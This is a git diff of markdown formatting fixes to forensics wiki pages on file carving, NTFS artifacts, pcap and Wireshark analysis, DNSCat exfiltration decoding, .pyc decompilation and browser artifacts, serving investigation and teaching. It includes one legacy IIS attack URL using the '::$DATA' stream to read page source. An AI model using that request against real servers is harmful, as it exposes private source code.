@@ -8,9 +8,9 @@ More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github
 
 The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files.
 
-### Binwalk <a href="binwalk" id="binwalk"></a>
+### Binwalk <a href="#binwalk" id="binwalk"></a>
 
-**Binwalk **is a tool for searching binary files like images and audio files for embedded files and data.\
+**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data.\
 It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github.\
 **Useful commands**:
 
@@ -33,7 +33,7 @@ foremost -v -i file.img -o output
 
 ### **Scalpel**
 
-**Scalpel **is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract.
+**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract.
 
 ```bash
 sudo apt-get install scalpel
@@ -42,19 +42,19 @@ scalpel file.img -o output
 
 ### Bulk Extractor
 
-This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor)
+This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
 
-This tool can scan an image and will **extract pcaps** inside it, **network information(URLs, domains, IPs, MACs, mails)** and more** files**. You only have to do:
+This tool can scan an image and will **extract pcaps** inside it, **network information(URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do:
 
 ```
 bulk_extractor memory.img -o out_folder
 ```
 
-Navigate through** all the information** that the tool has gathered (passwords?), **analyse **the **packets **(read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware **or **non-existent**).
+Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**).
 
 ### PhotoRec
 
-You can find it in [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
+You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download)
 
 It comes with GUI and CLI version. You can select the **file-types** you want PhotoRec to search for.
 
@@ -68,7 +68,7 @@ Searches for AES keys by searching for their key schedules. Able to find 128. 19
 
 Download [here](https://sourceforge.net/projects/findaes/).
 
-## Complementary tools 
+## Complementary tools&#x20;
 
-You can use [**viu **](https://github.com/atanunq/viu)to see images form the terminal.\
+You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal.\
 You can use the linux command line tool **pdftotext** to transform a pdf into text and read it.
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
index 5593b655..17b34b63 100644
--- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
@@ -29,15 +29,15 @@ When you format an NTFS volume, the format program allocates the first 16 sector
 
 ### **Master File Table o $MFT**
 
-The NTFS file system contains a file called the _master file table_, or MFT. There is at least **one entry in the MFT for every file on an NTFS file system** volume, including the MFT itself. All information about a file, including its** size, time and date stamps, permissions, and data content**, is stored either in MFT entries, or in space outside the MFT that is described by MFT entries.
+The NTFS file system contains a file called the _master file table_, or MFT. There is at least **one entry in the MFT for every file on an NTFS file system** volume, including the MFT itself. All information about a file, including its **size, time and date stamps, permissions, and data content**, is stored either in MFT entries, or in space outside the MFT that is described by MFT entries.
 
-As **files are added** to an NTFS file system volume, more entries are added to the MFT and the **MFT increases in size**. When **files** are **deleted** from an NTFS file system volume, their **MFT entries are marked as free **and may be reused. However, disk space that has been allocated for these entries is not reallocated, and the size of the MFT does not decrease.
+As **files are added** to an NTFS file system volume, more entries are added to the MFT and the **MFT increases in size**. When **files** are **deleted** from an NTFS file system volume, their **MFT entries are marked as free** and may be reused. However, disk space that has been allocated for these entries is not reallocated, and the size of the MFT does not decrease.
 
-The NTFS file system **reserves space for the MFT to keep the MFT as contiguous as possible** as it grows. The space reserved by the NTFS file system for the MFT in each volume is called the** MFT zone**. Space for file and directories are also allocated from this space, but only after all of the volume space outside of the MFT zone has been allocated.
+The NTFS file system **reserves space for the MFT to keep the MFT as contiguous as possible** as it grows. The space reserved by the NTFS file system for the MFT in each volume is called the **MFT zone**. Space for file and directories are also allocated from this space, but only after all of the volume space outside of the MFT zone has been allocated.
 
-Depending on the average file size and other variables,** either the reserved MFT zone or the unreserved space on the disk may be allocated first as the disk fills to capacity**. Volumes with a small number of relatively large files will allocate the unreserved space first, while volumes with a large number of relatively small files allocate the MFT zone first. In either case, fragmentation of the MFT starts to take place when one region or the other becomes fully allocated. If the unreserved space is completely allocated, space for user files and directories will be allocated from the MFT zone. If the MFT zone is completely allocated, space for new MFT entries will be allocated from the unreserved space.
+Depending on the average file size and other variables, **either the reserved MFT zone or the unreserved space on the disk may be allocated first as the disk fills to capacity**. Volumes with a small number of relatively large files will allocate the unreserved space first, while volumes with a large number of relatively small files allocate the MFT zone first. In either case, fragmentation of the MFT starts to take place when one region or the other becomes fully allocated. If the unreserved space is completely allocated, space for user files and directories will be allocated from the MFT zone. If the MFT zone is completely allocated, space for new MFT entries will be allocated from the unreserved space.
 
-NTFS file systems also generate a** $MFTMirror**. This is a **copy** of the **first 4 entries** of the MFT: $MFT, $MFT Mirror, $Log, $Volume.
+NTFS file systems also generate a **$MFTMirror**. This is a **copy** of the **first 4 entries** of the MFT: $MFT, $MFT Mirror, $Log, $Volume.
 
 NTFS reserves the first 16 records of the table for special information:
 
@@ -88,41 +88,41 @@ Each MFT entry has several attributes as the following image indicates:
 
 Each attribute indicates some entry information identified by the type:
 
-| Type Identifier | Name                   | Description                                                                                                       |
-| --------------- | ---------------------- | ----------------------------------------------------------------------------------------------------------------- |
-| 16              | $STANDARD_INFORMATION  | General information, such as flags; the last accessed, written, and created times; and the owner and security ID. |
-| 32              | $ATTRIBUTE_LIST        | List where other attributes for file can be found.                                                                |
-| 48              | $FILE_NAME             | File name, in Unicode, and the last accessed, written, and created times.                                         |
-| 64              | $VOLUME_VERSION        | Volume information. Exists only in version 1.2 (Windows NT).                                                      |
-| 64              | $OBJECT_ID             | A 16-byte unique identifier for the file or directory. Exists only in versions 3.0+ and after (Windows 2000+).    |
-| 80              | $SECURITY\_ DESCRIPTOR | The access control and security properties of the file.                                                           |
-| 96              | $VOLUME_NAME           | Volume name.                                                                                                      |
-| 112             | $VOLUME\_ INFORMATION  | File system version and other flags.                                                                              |
-| 128             | $DATA                  | File contents.                                                                                                    |
-| 144             | $INDEX_ROOT            | Root node of an index tree.                                                                                       |
-| 160             | $INDEX_ALLOCATION      | Nodes of an index tree rooted in $INDEX_ROOT attribute.                                                           |
-| 176             | $BITMAP                | A bitmap for the $MFT file and for indexes.                                                                       |
-| 192             | $SYMBOLIC_LINK         | Soft link information. Exists only in version 1.2 (Windows NT).                                                   |
-| 192             | $REPARSE_POINT         | Contains data about a reparse point, which is used as a soft link in version 3.0+ (Windows 2000+).                |
-| 208             | $EA_INFORMATION        | Used for backward compatibility with OS/2 applications (HPFS).                                                    |
-| 224             | $EA                    | Used for backward compatibility with OS/2 applications (HPFS).                                                    |
-| 256             | $LOGGED_UTILITY_STREAM | Contains keys and information about encrypted attributes in version 3.0+ (Windows 2000+).                         |
+| Type Identifier | Name                     | Description                                                                                                       |
+| --------------- | ------------------------ | ----------------------------------------------------------------------------------------------------------------- |
+| 16              | $STANDARD\_INFORMATION   | General information, such as flags; the last accessed, written, and created times; and the owner and security ID. |
+| 32              | $ATTRIBUTE\_LIST         | List where other attributes for file can be found.                                                                |
+| 48              | $FILE\_NAME              | File name, in Unicode, and the last accessed, written, and created times.                                         |
+| 64              | $VOLUME\_VERSION         | Volume information. Exists only in version 1.2 (Windows NT).                                                      |
+| 64              | $OBJECT\_ID              | A 16-byte unique identifier for the file or directory. Exists only in versions 3.0+ and after (Windows 2000+).    |
+| 80              | $SECURITY\_ DESCRIPTOR   | The access control and security properties of the file.                                                           |
+| 96              | $VOLUME\_NAME            | Volume name.                                                                                                      |
+| 112             | $VOLUME\_ INFORMATION    | File system version and other flags.                                                                              |
+| 128             | $DATA                    | File contents.                                                                                                    |
+| 144             | $INDEX\_ROOT             | Root node of an index tree.                                                                                       |
+| 160             | $INDEX\_ALLOCATION       | Nodes of an index tree rooted in $INDEX\_ROOT attribute.                                                          |
+| 176             | $BITMAP                  | A bitmap for the $MFT file and for indexes.                                                                       |
+| 192             | $SYMBOLIC\_LINK          | Soft link information. Exists only in version 1.2 (Windows NT).                                                   |
+| 192             | $REPARSE\_POINT          | Contains data about a reparse point, which is used as a soft link in version 3.0+ (Windows 2000+).                |
+| 208             | $EA\_INFORMATION         | Used for backward compatibility with OS/2 applications (HPFS).                                                    |
+| 224             | $EA                      | Used for backward compatibility with OS/2 applications (HPFS).                                                    |
+| 256             | $LOGGED\_UTILITY\_STREAM | Contains keys and information about encrypted attributes in version 3.0+ (Windows 2000+).                         |
 
-For example the **type 48 (0x30)** identifies the** file name**:
+For example the **type 48 (0x30)** identifies the **file name**:
 
 ![](<../../../.gitbook/assets/image (508).png>)
 
-It is also useful to understand that** these attributes can be resident** (meaning, they exist within a given MFT record) or **nonresident** (meaning, they exist outside a given MFT record, elsewhere on the disk, and are simply referenced within the record). For example, if the attribute **$Data is resident**, these means that the **whole file is saved in the MFT**, if it's nonresident, then the content of the file is in other part of the file system.
+It is also useful to understand that **these attributes can be resident** (meaning, they exist within a given MFT record) or **nonresident** (meaning, they exist outside a given MFT record, elsewhere on the disk, and are simply referenced within the record). For example, if the attribute **$Data is resident**, these means that the **whole file is saved in the MFT**, if it's nonresident, then the content of the file is in other part of the file system.
 
 Some interesting attributes:
 
-* [$STANDARD_INFORMATION](https://flatcap.org/linux-ntfs/ntfs/attributes/standard_information.html) (among others):
+* [$STANDARD\_INFORMATION](https://flatcap.org/linux-ntfs/ntfs/attributes/standard\_information.html) (among others):
   * Creation date
   * Modification date
   * Access date
   * MFT update date
   * DOS File permissions
-* [$FILE_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file_name.html) (among others): 
+* [$FILE\_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file\_name.html) (among others):&#x20;
   * File name
   * Creation date
   * Modification date
@@ -130,7 +130,7 @@ Some interesting attributes:
   * MFT update date
   * Allocated size
   * Real size
-  * [File reference](https://flatcap.org/linux-ntfs/ntfs/concepts/file_reference.html) to the parent directory.
+  * [File reference](https://flatcap.org/linux-ntfs/ntfs/concepts/file\_reference.html) to the parent directory.
 * [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) (among others):
   * Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
 
@@ -142,7 +142,7 @@ Some interesting attributes:
 
 ![](<../../../.gitbook/assets/image (512).png>)
 
-Another useful tool to analyze the MFT is [**MFT2csv**](https://github.com/jschicht/Mft2Csv)** **(select the mft file or the image and press dump all and extract to extract al the objects).\
+Another useful tool to analyze the MFT is [**MFT2csv**](https://github.com/jschicht/Mft2Csv) **** (select the mft file or the image and press dump all and extract to extract al the objects).\
 This program will extract all the MFT data and present it in CSV format. It can also be used to dump the files.
 
 ![](<../../../.gitbook/assets/image (513).png>)
@@ -165,7 +165,7 @@ Filtering by filenames you can see **all the actions performed against a file**:
 
 ### $USNJnrl
 
-The file `$EXTEND/$USNJnrl/$J` is and alternate data stream of the file `$EXTEND$USNJnrl` . This artifact contains a** registry of changes produced inside the NTFS volume with more detail than `$LOGFILE`**.
+The file `$EXTEND/$USNJnrl/$J` is and alternate data stream of the file `$EXTEND$USNJnrl` . This artifact contains a **registry of changes produced inside the NTFS volume with more detail than `$LOGFILE`**.
 
 To inspect this file you can use the tool [**UsnJrnl2csv**](https://github.com/jschicht/UsnJrnl2Csv).
 
@@ -177,15 +177,15 @@ Filtering by the filename it's possible to see **all the actions performed again
 
 Every **directory** in the file system contains an **`$I30`** **attribute** that must be maintained whenever there are changes to the directory's contents. When files or folders are removed from the directory, the **`$I30`** index records are re-arranged accordingly. However, **re-arranging of the index records may leave remnants of the deleted file/folder entry within the slack space**. This can be useful in forensics analysis for identifying files that may have existed on the drive.
 
-You can get the `$I30` file of a directory from the **FTK Imager **and inspect it with the tool [Indx2Csv](https://github.com/jschicht/Indx2Csv).
+You can get the `$I30` file of a directory from the **FTK Imager** and inspect it with the tool [Indx2Csv](https://github.com/jschicht/Indx2Csv).
 
 ![](<../../../.gitbook/assets/image (519).png>)
 
-With this data you can find** information about the file changes performed inside the folder** but note that the deletion time of a file isn't saved inside this logs. However, you can see that** last modified date** of the **`$I30` file**, and if the** last action performed** over the directory is the **deletion** of a file, the times may be the same.
+With this data you can find **information about the file changes performed inside the folder** but note that the deletion time of a file isn't saved inside this logs. However, you can see that **last modified date** of the **`$I30` file**, and if the **last action performed** over the directory is the **deletion** of a file, the times may be the same.
 
 ### $Bitmap
 
-The **`$BitMap`** is a special file within the NTFS file system. This file keeps** track of all of the used and unused clusters** on an NTFS volume. When a file takes up space on the NTFS volume the location is uses is marked out in the `$BitMap`.
+The **`$BitMap`** is a special file within the NTFS file system. This file keeps **track of all of the used and unused clusters** on an NTFS volume. When a file takes up space on the NTFS volume the location is uses is marked out in the `$BitMap`.
 
 ![](<../../../.gitbook/assets/image (523).png>)
 
@@ -194,7 +194,7 @@ The **`$BitMap`** is a special file within the NTFS file system. This file keeps
 Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called `:$DATA`.\
 In this [page you can see different ways to create/access/discover alternate data streams](../../../windows/basic-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream) from the console. In the past this cause a vulnerability in IIS as people was able to access the source code of a page by accessing the `:$DATA` stream like `http://www.alternate-data-streams.com/default.asp::$DATA`.
 
-Using the tool [**AlternateStreamView**](https://www.nirsoft.net/utils/alternate_data_streams.html) you can search and export all the files with some ADS.
+Using the tool [**AlternateStreamView**](https://www.nirsoft.net/utils/alternate\_data\_streams.html) you can search and export all the files with some ADS.
 
 ![](<../../../.gitbook/assets/image (518).png>)
 
@@ -202,7 +202,7 @@ Using the FTK imager and double clicking in a file with ADS you can **access the
 
 ![](<../../../.gitbook/assets/image (517).png>)
 
-If you find an ADS called **`Zone.Identifier`** (see previous image) this usually contains** information about how was the file downloaded**. There would be a "ZoneId" field with the following info:
+If you find an ADS called **`Zone.Identifier`** (see previous image) this usually contains **information about how was the file downloaded**. There would be a "ZoneId" field with the following info:
 
 * Zone ID = 0 -> Mycomputer
 * Zone ID = 1 -> Intranet
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md
index b9ba7db8..14dffd23 100644
--- a/forensics/basic-forensic-methodology/pcap-inspection/README.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md
@@ -28,7 +28,7 @@ You can find some Wireshark trick in:
 
 ### Xplico Framework
 
-****[**Xplico **](https://github.com/xplico/xplico)_(only linux)_** **can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
+****[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ **** can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
 
 #### Install
 
@@ -46,18 +46,18 @@ sudo apt-get install xplico
 /etc/init.d/xplico start
 ```
 
-Access to _**127.0.0.1:9876 **_with credentials _**xplico:xplico**_
+Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_
 
 Then create a **new case**, create a **new session** inside the case and **upload the pcap** file.
 
 ### NetworkMiner
 
-Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download **[**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\
+Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\
 This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening there in a **quick** way.
 
 ### NetWitness Investigator
 
-You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware)** (It works in Windows)**.\
+You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\
 This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**.
 
 ![](<../../../.gitbook/assets/image (567) (1) (1).png>)
@@ -118,7 +118,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
 
 ### YaraPcap
 
-****[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that 
+****[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that&#x20;
 
 * Reads a PCAP File and Extracts Http Streams.
 * gzip deflates any compressed streams
@@ -138,7 +138,7 @@ Check if you can find any fingerprint of a known malware:
 
 > Zeek is a passive, open-source network traffic analyzer. Many operators use Zeek as a network security monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting.
 
-Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information **about the pcaps are.
+Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are.
 
 ### Connections Info
 
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
index df6aa790..5c9e6e55 100644
--- a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
@@ -2,7 +2,7 @@
 
 If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
 
-You only need to know that the **first 9 bytes** are not real data but are related to the** C\&C communication**:
+You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**:
 
 ```python
 from scapy.all import rdpcap, DNSQR, DNSRR
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
index 076286bd..a5a9dcca 100644
--- a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
@@ -26,9 +26,9 @@ The following link will be useful to find the **machines sending data inside a W
 
 * `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2`
 
-If you already know **MAC addresses you can remove them from the output **adding checks like this one: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
+If you already know **MAC addresses you can remove them from the output** adding checks like this one: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
 
-Once you have detected **unknown MAC **addresses communicating inside the network you can use **filters **like the following one: `wlan.addr==<MAC address> && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic.
+Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr==<MAC address> && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic.
 
 ## Decrypt Traffic
 
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
index dae1e917..acffa2f3 100644
--- a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
@@ -34,25 +34,25 @@ Under _**Statistics --> Protocol Hierarchy**_ you can find the **protocols** **i
 
 #### Conversations
 
-Under _**Statistics --> Conversations **_you can find a **summary of the conversations** in the communication and data about them.
+Under _**Statistics --> Conversations**_ you can find a **summary of the conversations** in the communication and data about them.
 
 ![](<../../../.gitbook/assets/image (573).png>)
 
 #### **Endpoints**
 
-Under _**Statistics --> Endpoints **_you can find a **summary of the endpoints** in the communication and data about each of them.
+Under _**Statistics --> Endpoints**_ you can find a **summary of the endpoints** in the communication and data about each of them.
 
 ![](<../../../.gitbook/assets/image (575).png>)
 
 #### DNS info
 
-Under _**Statistics --> DNS **_you can find statistics about the DNS request captured.
+Under _**Statistics --> DNS**_ you can find statistics about the DNS request captured.
 
 ![](<../../../.gitbook/assets/image (577).png>)
 
 #### I/O Graph
 
-Under _**Statistics --> I/O Graph **_you can find a **graph of the communication.**
+Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication.**
 
 ![](<../../../.gitbook/assets/image (574).png>)
 
@@ -71,7 +71,7 @@ Other interesting filters:
 ### Search
 
 If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_\
-__You can add new layers to the main information bar_ (No., Time, Source...) _pressing _right bottom _and _Edit Column_
+__You can add new layers to the main information bar _(No., Time, Source...)_ pressing _right bottom_ and _Edit Column_
 
 Practice: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)
 
@@ -120,7 +120,7 @@ A file of shared keys will looks like this:
 
 ![](<../../../.gitbook/assets/image (99).png>)
 
-To import this in wireshark go to _edit>preference>protocol>ssl> _and import it in (Pre)-Master-Secret log filename:
+To import this in wireshark go to _edit>preference>protocol>ssl>_ and import it in (Pre)-Master-Secret log filename:
 
 ![](<../../../.gitbook/assets/image (100).png>)
 
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
index cc62bbee..212ba08b 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
@@ -2,7 +2,7 @@
 
 ## From Compiled Binary to .pyc
 
-From an **ELF **compiled binary you can **get the .pyc **with:
+From an **ELF** compiled binary you can **get the .pyc** with:
 
 ```bash
 pyi-archive_viewer <binary>
@@ -23,7 +23,7 @@ pyi-archive_viewer <binary>
 to filename? /tmp/binary.pyc
 ```
 
-In an **python exe binary** compiled you can **get the .pyc **by running:
+In an **python exe binary** compiled you can **get the .pyc** by running:
 
 ```bash
 python pyinstxtractor.py executable.exe
@@ -31,7 +31,7 @@ python pyinstxtractor.py executable.exe
 
 ## From .pyc to python code
 
-For the **.pyc **data ("compiled" python) you should start trying to **extract** the **original** **python** **code**:
+For the **.pyc** data ("compiled" python) you should start trying to **extract** the **original** **python** **code**:
 
 ```bash
 uncompyle6 binary.pyc  > decompiled.py
@@ -39,7 +39,7 @@ uncompyle6 binary.pyc  > decompiled.py
 
 **Be sure** that the binary has the **extension** "**.pyc**" (if not, uncompyle6 is not going to work)
 
-While executing **uncompyle6 **you might find the **following errors**:
+While executing **uncompyle6** you might find the **following errors**:
 
 ### Error: Unknown magic number 227
 
@@ -48,7 +48,7 @@ While executing **uncompyle6 **you might find the **following errors**:
 Unknown magic number 227 in /tmp/binary.pyc
 ```
 
-In order to fix this you need to **add the correct magic number **at the begging of the generated fil.
+In order to fix this you need to **add the correct magic number** at the begging of the generated fil.
 
 **Magic numbers vary with the python version**, to get the magic number of **python3.8** you will need to **open a python3.8** terminal and execute:
 
@@ -58,9 +58,9 @@ In order to fix this you need to **add the correct magic number **at the begging
 '550d0d0a'
 ```
 
-The **magic number **in this case for python3.8 is **`0x550d0d0a`**, then, to fix this error you will need to **add **at the **begging **of the **.pyc file** the following bytes: `0x0d550a0d000000000000000000000000`
+The **magic number** in this case for python3.8 is **`0x550d0d0a`**, then, to fix this error you will need to **add** at the **begging** of the **.pyc file** the following bytes: `0x0d550a0d000000000000000000000000`
 
-**Once **you have **added **that magic header, the** error should be fixed.**
+**Once** you have **added** that magic header, the **error should be fixed.**
 
 This is how a correctly added **.pyc python3.8 magic header** will looks like:
 
@@ -74,15 +74,15 @@ hexdump 'binary.pyc' | head
 
 ### Error: Decompiling generic errors
 
-**Other errors **like: `class 'AssertionError'>; co_code should be one of the types (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); is type <class 'NoneType'>` may appear.
+**Other errors** like: `class 'AssertionError'>; co_code should be one of the types (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); is type <class 'NoneType'>` may appear.
 
-This probably means that you** haven't added correctly** the magic number or that you haven't **used **the **correct magic number**, so make **sure you use the correct one** (or try a new one).
+This probably means that you **haven't added correctly** the magic number or that you haven't **used** the **correct magic number**, so make **sure you use the correct one** (or try a new one).
 
 Check the previous error documentation.
 
 ## Automatic Tool
 
-The tool [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) glues together several tools available to the community that** helps researcher to unpack and decompile executable** written in python (py2exe and pyinstaller).&#x20;
+The tool [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) glues together several tools available to the community that **helps researcher to unpack and decompile executable** written in python (py2exe and pyinstaller).&#x20;
 
 Several YARA rules are available to determine if the executable is written in python (This script also confirms if the executable is created with either py2exe or pyinstaller).
 
@@ -108,7 +108,7 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
 
 ## Analyzing python assembly
 
-If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **dissasemble** the_ .pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2:
+If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **dissasemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2:
 
 ```bash
 >>> import dis
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
index ea88c7b7..abf70e91 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
@@ -1,6 +1,6 @@
 # Browser Artifacts
 
-## Browsers Artefacts <a href="3def" id="3def"></a>
+## Browsers Artefacts <a href="#3def" id="3def"></a>
 
 When we talk about browser artefacts we talk about, navigation history, bookmarks, list of downloaded files, cache data…etc.
 
@@ -11,27 +11,27 @@ Each browser stores its files in a different place than other browsers and they
 Let us take a look at the most common artefacts stored by browsers.
 
 * **Navigation History :** Contains data about the navigation history of the user. Can be used to track down if the user has visited some malicious sites for example
-* **Autocomplete Data : **This is the data that the browser suggest based on what you search the most. Can be used in tandem with the navigation history to get more insight.
-* **Bookmarks : **Self Explanatory.
-* **Extensions and Addons : **Self Explanatory.
-* **Cache : **When navigating websites, the browser creates all sorts of cache data (images, javascript files…etc) for many reasons. For example to speed loading time of websites. These cache files can be a great source of data during a forensic investigation.
-* **Logins : **Self Explanatory.
+* **Autocomplete Data :** This is the data that the browser suggest based on what you search the most. Can be used in tandem with the navigation history to get more insight.
+* **Bookmarks :** Self Explanatory.
+* **Extensions and Addons :** Self Explanatory.
+* **Cache :** When navigating websites, the browser creates all sorts of cache data (images, javascript files…etc) for many reasons. For example to speed loading time of websites. These cache files can be a great source of data during a forensic investigation.
+* **Logins :** Self Explanatory.
 * **Favicons :** They are the little icons found in tabs, urls, bookmarks and the such. They can be used as another source to get more information about the website or places the user visited.
-* **Browser Sessions : **Self Explanatory.
+* **Browser Sessions :** Self Explanatory.
 * **Downloads :**Self Explanatory.
-* **Form Data : **Anything typed inside forms is often times stored by the browser, so the next time the user enters something inside of a form the browser can suggest previously entered data.
-* **Thumbnails : **Self Explanatory.
+* **Form Data :** Anything typed inside forms is often times stored by the browser, so the next time the user enters something inside of a form the browser can suggest previously entered data.
+* **Thumbnails :** Self Explanatory.
 
 ## Firefox
 
-Firefox use to create the profiles folder in \~/_**.mozilla/firefox/**_ (Linux),  in **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS), _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\ **_(Windows)_**.**_\
+Firefox use to create the profiles folder in \~/_**.mozilla/firefox/**_ (Linux),  in **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS), _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_ (Windows)_**.**_\
 Inside this folder, the file _**profiles.ini**_ should appear with the name(s) of the used profile(s).\
-Each profile has a "**Path**" variable with the name of the folder where it's data is going to be stored. The folder should be** present in the same directory where the **_**profiles.ini**_** exist**. If it isn't, then, probably it was deleted.
+Each profile has a "**Path**" variable with the name of the folder where it's data is going to be stored. The folder should be **present in the same directory where the **_**profiles.ini**_** exist**. If it isn't, then, probably it was deleted.
 
-Inside the folder **of each profile **(_\~/.mozilla/firefox/\<ProfileName>/_) path you should be able to find the following interesting files:
+Inside the folder **of each profile** (_\~/.mozilla/firefox/\<ProfileName>/_) path you should be able to find the following interesting files:
 
